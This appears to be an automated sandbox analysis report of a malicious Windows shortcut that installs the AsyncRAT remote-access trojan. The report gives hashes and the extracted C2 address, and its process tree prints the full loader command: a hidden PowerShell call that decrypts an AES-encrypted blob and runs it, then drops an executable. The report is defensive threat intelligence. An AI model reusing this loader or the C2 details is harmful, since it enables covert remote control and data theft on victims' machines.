Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2024 20:03
Static task
static1
Behavioral task
behavioral1
Sample
RunScriptProtected.lnk
Resource
win7-20240903-en
General
-
Target
RunScriptProtected.lnk
-
Size
3KB
-
MD5
7d7b89cb7fa6155b1e01334175ac1c5b
-
SHA1
e777ad0ff4d4510ee345c06c34123b279b0b7ad6
-
SHA256
7c8be71b3cfef2de7343bd48d20e33a6f2f94409d59c50f5ac3a5bbd703789fc
-
SHA512
bd1ddf6149e7d51339ba326ad6fbd9d0b7eb4a2e6a0ca90cfd6a9024df0ee81e0cc2ac2e77e4c1b86146d4d06ccc24696c320d5ea166cf79d9062ff9d3b22038
Malware Config
Extracted
asyncrat
0.5.8
Default
alainlegrosper.ddns.net:6606
sgXgvLmJ6SR3
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000b000000023b8b-20.dat family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4028 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4028 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4992 tmpA0D4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmpA0D4.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4028 powershell.exe 4028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 4992 tmpA0D4.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 64 wrote to memory of 4028 64 cmd.exe 83 PID 64 wrote to memory of 4028 64 cmd.exe 83 PID 4028 wrote to memory of 4992 4028 powershell.exe 84 PID 4028 wrote to memory of 4992 4028 powershell.exe 84 PID 4028 wrote to memory of 4992 4028 powershell.exe 84
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RunScriptProtected.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:64 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {param($a, $b) $KEYIV = '3Q1aUNn15Me1VlTQAQdGsm8ekXBkW2FFrSBt93j4N9Hg2QMZ60uGi6hdUECTkmywWn5vE4REAgxDeSoQIFpLq0zLiYkkC3WftAtNr6bgSVPoN2eYpSVCgq7FapPgUIfMZiDkS4Z7ibn7XIe6LuOlTPHS0ibnAmKQ5eCYXNZdOKzILr7TAIImXk5QH61FidAIOBZrbTQpHYRM98yNGmvMOzONCZQfuvr'; $command = [System.Convert]::FromBase64String($a); $key = [System.Convert]::FromBase64String($b); $e = New-Object System.Security.Cryptography.AesManaged; $e.Key = $key; $e.IV = $command[0..15]; $f = $e.CreateDecryptor(); $g = $f.TransformFinalBlock($command[16..$command.Length], 0, $command.Length - 16); $h = [System.Text.Encoding]::UTF8.GetString($g); Invoke-Expression $h; }" -a "qs9K8ECrxJ4RYgoGXBOVA5zoSztl2ZXPpldKefb9lZYVjASx3hpM1DG7Td3mzXA7B5gsnqQ74Cf8nu4rHbTQMgCpXtC7lraiyB1QP5NLcaIqIUGuJEX8Yeh6OaMu87mbALezjUugDAG8K6pcwYBuptmyjFZy3nos4aELD9IL8TOAxjBh/YryQcekOlA++MRBusflRl3EOvlALID34VFe304kjnyI10ZlLqUrqV3m7ag=" -b "I2gGFN92JQ7raC35ha14JzISlRbQCYzWrkxCskiY01c="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\tmpA0D4.exe"C:\Users\Admin\AppData\Local\Temp\tmpA0D4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
45KB
MD57618cd8136bc7dffe953a5d906581ead
SHA16c4dbdf1063f2b099349ac2389fb40de2b2f57f4
SHA2565bac7b2cfe8310cf823d5e504203c290e35d8e8309f04edb99d4800ad230fe0d
SHA5127684ebc1d09fd79d3e5812418f3bd64d5dd27c8713e08caae0bc31318a415d5ac6c10ba5433bfeef5f1bff275037a3e924b501ca29baf262fa8beebbfa8644ad